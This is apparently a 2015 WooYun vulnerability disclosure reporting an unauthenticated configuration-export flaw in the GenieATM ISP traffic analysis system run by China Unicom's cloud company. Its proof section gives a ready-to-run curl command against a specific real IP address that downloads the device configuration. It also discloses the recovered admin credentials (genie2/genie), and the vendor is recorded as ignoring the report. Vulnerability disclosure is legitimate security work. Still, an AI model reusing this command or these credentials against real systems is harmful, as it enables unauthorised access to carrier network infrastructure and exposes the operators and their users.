当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091726

漏洞标题:联通云公司-流量分析系统GenieATM ISP存在非授权导出配置文件漏洞

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-01-15 12:28

修复时间:2015-01-20 12:30

公开时间:2015-01-20 12:30

漏洞类型:网络未授权访问

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-15: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

异常流量检测和迁移系统,运营商级别的设备,该类设备一般不会轻易暴露管理地址,所以案例并不能一一百度查询到
系统功能以及影响可以百度查询产品说明获得。
测试版本GenieATM ISP MPLS version: 5.6. 系列
该厂商并不是中国厂商,但是国内用户较多,多为运营商类,希望审核后转给cncert进行处理,如果不能修补漏洞,建议将后台进行隐藏,限制访问地址等!

详细说明:

测试版本GenieATM ISP MPLS version: 5.6存在非授权导出系统配置漏洞,且配置文件内包含管理员帐号和密码,虽然MD5加密,但是在测试的两个案例里面均可在CMD5进行查询。
联通云公司-流量分析系统
http://103.243.137.4/index.php

漏洞证明:

获取配置文件
curl "http://103.243.137.4/atm_loader_info?sno=71640642&info_type=DownloadConfig&config_ver=112" >1.txt
输出到1.txt文件中,
查找conf_user_info 处,存在用户密码hash

2015-01-13_215646.png


用户:genie2,密码为genie。

修复方案:

好像一直没有修复呀。
先前已经暴出电信、移动都使用该设备,这下齐了。
建议限制访问的IP地址。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-20 12:30

厂商回复:

最新状态:

暂无